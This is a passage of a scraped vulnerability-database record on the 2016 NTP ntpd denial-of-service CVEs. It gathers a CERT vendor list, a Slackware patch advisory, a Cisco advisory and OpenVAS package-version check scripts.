Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### Zephyr Project Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### ZyXEL Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### dnsmasq Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### gdnsd Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### m0n0wall Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### openSUSE project Unknown\n\nNotified: November 21, 2016 Updated: November 21, 2016 \n\n### Status\n\nUnknown\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor References\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | 7.8 | AV:N/AC:L/Au:N/C:N/I:N/A:C \nTemporal | 6.1 | E:POC/RL:OF/RC:C \nEnvironmental | 6.1 | CDP:ND/TD:H/CR:ND/IR:ND/AR:ND \n\n### References \n\n * <http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se>\n * [nwtime.org/ntp428p9_release](<nwtime.org/ntp428p9_release>)\n\n### Acknowledgements\n\nNTP.org thanks Matthew Van Gundy of Cisco, Robert Pajak, Sharon Goldberg and Aanchal Malhotra of Boston University, Magnus Stubman, Miroslav Lichvar of Red Hat, and Brian Utterback of 
Oracle for reporting these vulnerabilities.\n\nThis document was written by Garret Wassermann.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2016-7426](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7426>), [CVE-2016-7427](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7427>), [CVE-2016-7428](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7428>), [CVE-2016-7429](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7429>), [CVE-2016-7431](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7431>), [CVE-2016-7433](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7433>), [CVE-2016-7434](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-7434>), [CVE-2016-9310](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-9310>), [CVE-2016-9312](<http://web.nvd.nist.gov/vuln/detail/CVE-2016-9312>) \n---|--- \n**Date Public:** | 2016-11-21 \n**Date First Published:** | 2016-11-21 \n**Date Last Updated: ** | 2017-11-20 15:38 UTC \n**Document Revision: ** | 26 \n", "modified": "2017-11-20T15:38:00", "published": "2016-11-21T00:00:00", "id": "VU:633847", "href": "https://www.kb.cert.org/vuls/id/633847", "type": "cert", "title": "NTP.org ntpd contains multiple denial of service vulnerabilities", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:06", "bulletinFamily": "unix", "cvelist": ["CVE-2016-7426", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-9311", "CVE-2016-9312"], "description": "New ntp packages are available for Slackware 13.0, 13.1, 13.37, 14.0, 14.1,\n14.2, and -current to fix security issues.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/ntp-4.2.8p9-i586-1_slack14.2.txz: Upgraded.\n In addition to bug fixes and enhancements, this release fixes the\n following 1 high- (Windows only :-), 2 medium-, 2 medium-/low, and\n 5 low-severity vulnerabilities, and provides 28 other non-security\n fixes and improvements.\n 
CVE-2016-9311: Trap crash\n CVE-2016-9310: Mode 6 unauthenticated trap info disclosure and DDoS vector\n CVE-2016-7427: Broadcast Mode Replay Prevention DoS\n CVE-2016-7428: Broadcast Mode Poll Interval Enforcement DoS\n CVE-2016-9312: Windows: ntpd DoS by oversized UDP packet\n CVE-2016-7431: Regression: 010-origin: Zero Origin Timestamp Bypass\n CVE-2016-7434: Null pointer dereference in _IO_str_init_static_internal()\n CVE-2016-7429: Interface selection attack\n CVE-2016-7426: Client rate limiting and server responses\n CVE-2016-7433: Reboot sync calculation problem\n For more information, see:\n https://www.kb.cert.org/vuls/id/633847\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9311\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9310\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7427\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7428\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9312\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7431\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7434\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7429\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7426\n https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7433\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! 
:-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware-13.0/patches/packages/ntp-4.2.8p9-i486-1_slack13.0.txz\n\nUpdated package for Slackware x86_64 13.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.0/patches/packages/ntp-4.2.8p9-x86_64-1_slack13.0.txz\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/ntp-4.2.8p9-i486-1_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/ntp-4.2.8p9-x86_64-1_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/ntp-4.2.8p9-i486-1_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/ntp-4.2.8p9-x86_64-1_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/ntp-4.2.8p9-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/ntp-4.2.8p9-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/ntp-4.2.8p9-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/ntp-4.2.8p9-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/ntp-4.2.8p9-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/ntp-4.2.8p9-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware 
-current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/ntp-4.2.8p9-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/ntp-4.2.8p9-x86_64-1.txz\n\n\nMD5 signatures:\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg ntp-4.2.8p9-i586-1_slack14.2.txz\n\nThen, restart the NTP daemon:\n\n > sh /etc/rc.d/rc.ntpd restart", "modified": "2016-11-21T19:25:10", "published": "2016-11-21T19:25:10", "id": "SSA-2016-326-01", "href": 
"http://www.slackware.com/security/viewer.php?l=slackware-security&y=2016&m=slackware-security.641761", "type": "slackware", "title": "[slackware-security] ntp", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "cisco": [{"lastseen": "2020-12-24T11:41:14", "bulletinFamily": "software", "cvelist": ["CVE-2015-8138", "CVE-2016-7426", "CVE-2016-7427", "CVE-2016-7428", "CVE-2016-7429", "CVE-2016-7431", "CVE-2016-7433", "CVE-2016-7434", "CVE-2016-9310", "CVE-2016-9311", "CVE-2016-9312"], "description": "A vulnerability in Network Time Protocol (NTP) could allow an unauthenticated, remote attacker to modify the system clock on a targeted system.\n\nThe vulnerability is due to insufficient checks of user-supplied data by the affected software. An attacker could exploit this vulnerability by sending a crafted packet to a targeted NTP client. A successful exploit could disable server synchronization, resulting in the ability to modify the system clock on the targeted client system.\n\nA vulnerability in the Network Time Protocol (NTP) service could allow a local attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to improper initial sync calculations that are performed by the affected software. The vulnerability was introduced as the result of an attempt to fix NTP Bug 2085, involving a condition where the root delay was included twice, causing a higher than expected jitter value. Because of a misinterpretation of a small-print variable, a root distance would not include the peer dispersion. An attacker could exploit this vulnerability to cause a partial DoS condition on an affected system.\n\nA vulnerability in the Network Time Protocol (NTP) service could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to improper handling of crafted packets by the affected software when the trap service is enabled. 
An attacker could exploit this vulnerability by sending crafted packets to a targeted system. An exploit could cause a NULL pointer dereference that could cause the ntpd service to crash, resulting in a DoS condition.\n\nA vulnerability in the Network Time Protocol (NTP) service could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to insufficient resource pooling when rate limiting for all associations is configured within the affected software. An attacker could exploit this vulnerability by sending crafted packets with a spoofed source address to the targeted system. An exploit could prevent the affected software from accepting valid responses from its configured sources, resulting in a DoS condition.\n\nA vulnerability in the Network Time Protocol daemon (ntpd) could allow a local attacker to cause a denial of service (DoS) condition on a targeted system.\n\nThe vulnerability is due to improper validation of user-supplied data by the affected software. An attacker could exploit the vulnerability by sending a malicious packet to a targeted system. A successful exploit could cause the ntpd to stop functioning, resulting in a DoS condition.\n\nA vulnerability in the Network Time Protocol daemon (ntpd) could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition on a targeted system.\n\nThe vulnerability is due to improper validation of user-supplied data by the affected software. An unauthenticated, remote attacker could exploit the vulnerability by sending a malicious packet to a targeted system. 
A successful exploit could cause the ntpd to stop functioning, resulting in a DoS condition.\n\nA vulnerability in the broadcast-mode, poll-interval enforcement functionality of the Network Time Protocol (NTP) service could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to improper resource management by the affected software. An attacker who has access to the broadcast domain of a targeted system could exploit this vulnerability by injecting crafted, broadcast-mode NTP packets into the broadcast domain in which the targeted system resides. A successful exploit could cause the NTP daemon to reject broadcast-mode packets from legitimate broadcast servers, resulting in a DoS condition.\n\nA vulnerability in the broadcast-mode, replay prevention functionality of the Network Time Protocol (NTP) service could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to improper resource management by the affected software. An attacker who has access to the broadcast domain of a targeted system could exploit this vulnerability by injecting crafted, broadcast-mode NTP packets into the broadcast domain in which the targeted system resides. A successful exploit could cause the NTP daemon to reject broadcast-mode packets from legitimate broadcast servers, resulting in a DoS condition.\n\nA vulnerability in the control mode (mode 6) functionality of the Network Time Protocol (NTP) service could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition.\n\nThe vulnerability is due to improper security restrictions that could lead to configuration modification. If the restrict default noquery best current practices recommendation for NTP is not specified, an attacker could exploit this vulnerability by sending a crafted control mode packet to an affected system. 
An exploit could allow the attacker to modify the affected software. The attacker could set ntpd traps, which could be leveraged to disclose sensitive information or aid in DDoS amplification. In addition, an attacker could unset ntpd traps, which could disable monitoring, resulting in a DoS condition.\n\nMultiple Cisco products incorporate a version of the Network Time Protocol daemon (ntpd) package. Versions of this package are affected by one or more vulnerabilities that could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition or modify the time being advertised by a device acting as a Network Time Protocol (NTP) server.\n\nOn November 21, 2016, the NTP Consortium of the Network Time Foundation released a security notice that details ten issues regarding DoS vulnerabilities and logic issues that may allow an attacker to shift a system's time.\n\nThe new vulnerabilities disclosed in this document are as follows:\n\nNetwork Time Protocol Trap Service Denial of Service Vulnerability\nNetwork Time Protocol Broadcast Mode Denial of Service Vulnerability\nNetwork Time Protocol Broadcast Mode Denial of Service Vulnerability\nNetwork Time Protocol Insufficient Resource Pool Denial of Service Vulnerability\nNetwork Time Protocol Configuration Modification Denial of Service Vulnerability\nNetwork Time Protocol mrulist Query Requests Denial of Service Vulnerability\nNetwork Time Protocol Multiple Binds to the Same Port Vulnerability\nNetwork Time Protocol Rate Limiting Denial of Service Vulnerability\n\nAs well as:\n\nRegression of CVE-2015-8138\nNetwork Time Protocol Reboot sync calculation problem\n Additional details about each vulnerability are in the NTP Consortium Security Notice [\"http://support.ntp.org/bin/view/Main/SecurityNotice#November_2016_ntp_4_2_8p9_NTP_Se\"].\n\nWorkarounds that address one or more of these vulnerabilities may be available and are documented in the Cisco bug for each affected product.\n\nThis advisory is 
available at the following link:\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161123-ntpd [\"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161123-ntpd\"]", "modified": "2017-01-23T14:51:48", "published": "2016-11-23T16:00:00", "id": "CISCO-SA-20161123-NTPD", "href": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20161123-ntpd", "type": "cisco", "title": "Multiple Vulnerabilities in Network Time Protocol Daemon Affecting Cisco Products: November 2016", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "openvas": [{"lastseen": "2020-01-27T18:37:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "The remote host is missing an update for the Huawei EulerOS\n ", "modified": "2020-01-23T00:00:00", "published": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220171023", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220171023", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2017-1023)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2017.1023\");\n script_version(\"2020-01-23T10:44:21+0000\");\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:44:21 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:44:21 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for ntp (EulerOS-SA-2017-1023)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2017-1023\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1023\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'ntp' package(s) announced via the EulerOS-SA-2017-1023 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was found that when ntp is configured with rate limiting for all associations the limits are also applied to responses received from its configured sources. 
A remote attacker who knows the sources can cause a denial of service by preventing ntpd from accepting valid responses from its sources. (CVE-2016-7426)\n\nA flaw was found in the control mode functionality of ntpd. A remote attacker could send a crafted control mode packet which could lead to information disclosure or result in DDoS amplification attacks. (CVE-2016-9310)\n\n A flaw was found in the way ntpd implemented the trap service. A remote attacker could send a specially crafted packet to cause a null pointer dereference that will crash ntpd, resulting in a denial of service. (CVE-2016-9311)\n\nA flaw was found in the way ntpd running on a host with multiple network interfaces handled certain server responses. A remote attacker could use this flaw which would cause ntpd to not synchronize with the source. (CVE-2016-7429)\n\nA flaw was found in the way ntpd calculated the root delay. A remote attacker could send a specially-crafted spoofed packet to cause denial of service or in some special cases even crash. 
(CVE-2016-7433)\");\n\n script_tag(name:\"affected\", value:\"'ntp' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~25.0.1.h1\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~25.0.1.h1\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:35:48", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-12-08T00:00:00", "id": "OPENVAS:1361412562310872101", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872101", "type": "openvas", "title": "Fedora Update for ntp FEDORA-2016-7209ab4e02", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for ntp FEDORA-2016-7209ab4e02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is 
distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872101\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-08 09:37:06 +0100 (Thu, 08 Dec 2016)\");\n script_cve_id(\"CVE-2016-7433\", \"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-9310\", \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for ntp FEDORA-2016-7209ab4e02\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"ntp on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-7209ab4e02\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/U5E3XBBCK5IXOLDAH2E4M3QKIYIHUMMP\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n 
script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~43.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-02-07T00:00:00", "id": "OPENVAS:1361412562310871756", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871756", "type": "openvas", "title": "RedHat Update for ntp RHSA-2017:0252-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for ntp RHSA-2017:0252-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871756\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-02-07 05:44:27 +0100 (Tue, 07 Feb 2017)\");\n script_cve_id(\"CVE-2016-7426\", \"CVE-2016-7429\", \"CVE-2016-7433\", \"CVE-2016-9310\",\n \"CVE-2016-9311\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:N/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for ntp RHSA-2017:0252-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'ntp'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The Network Time Protocol (NTP) is used\nto synchronize a computer's time with another referenced time source. These\npackages include the ntpd service which continuously adjusts system time and\nutilities used to query and configure the ntpd service.\n\nSecurity Fix(es):\n\n * It was found that when ntp is configured with rate limiting for all\nassociations the limits are also applied to responses received from its\nconfigured sources. A remote attacker who knows the sources can cause a\ndenial of service by preventing ntpd from accepting valid responses from\nits sources. (CVE-2016-7426)\n\n * A flaw was found in the control mode functionality of ntpd. 
A remote\nattacker could send a crafted control mode packet which could lead to\ninformation disclosure or result in DDoS amplification attacks.\n(CVE-2016-9310)\n\n * A flaw was found in the way ntpd implemented the trap service. A remote\nattacker could send a specially crafted packet to cause a null pointer\ndereference that will crash ntpd, resulting in a denial of service.\n(CVE-2016-9311)\n\n * A flaw was found in the way ntpd running on a host with multiple network\ninterfaces handled certain server responses. A remote attacker could use\nthis flaw which would cause ntpd to not synchronize with the source.\n(CVE-2016-7429)\n\n * A flaw was found in the way ntpd calculated the root delay. A remote\nattacker could send a specially-crafted spoofed packet to cause denial of\nservice or in some special cases even crash. (CVE-2016-7433)\");\n script_tag(name:\"affected\", value:\"ntp on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Server (v. 7),\n Red Hat Enterprise Linux Workstation (v. 
6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:0252-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-February/msg00011.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(7|6)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~25.el7_3.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntp-debuginfo\", rpm:\"ntp-debuginfo~4.2.6p5~25.el7_3.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~25.el7_3.1\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"ntp\", rpm:\"ntp~4.2.6p5~10.el6_8.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntp-debuginfo\", rpm:\"ntp-debuginfo~4.2.6p5~10.el6_8.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"ntpdate\", rpm:\"ntpdate~4.2.6p5~10.el6_8.2\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:34:11", "bulletinFamily": 
"scanner", "cvelist": ["CVE-2016-9311", "CVE-2016-7433", "CVE-2016-7429", "CVE-2016-9310", "CVE-2016-7426"], "description": "Check the version of ntp", "modified": "2019-03-08T00:00:00", "published": "2017-02-07T00:00:00", "id": "OPENVAS:1361412562310882654", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310882654", "type": "openvas", "title": "CentOS Update for ntp CESA-2017:0252 centos6", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for ntp CESA-2017:0252 centos6\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
